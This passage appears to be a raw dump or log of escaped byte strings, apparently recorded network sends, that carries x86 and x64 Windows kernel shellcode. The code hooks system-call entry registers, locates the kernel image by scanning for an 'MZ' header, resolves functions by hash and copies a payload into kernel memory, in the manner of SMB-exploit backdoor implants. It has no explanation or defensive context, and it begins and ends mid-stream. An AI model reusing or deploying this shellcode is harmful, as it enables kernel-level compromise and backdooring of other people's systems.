\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', \"('send', 3, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc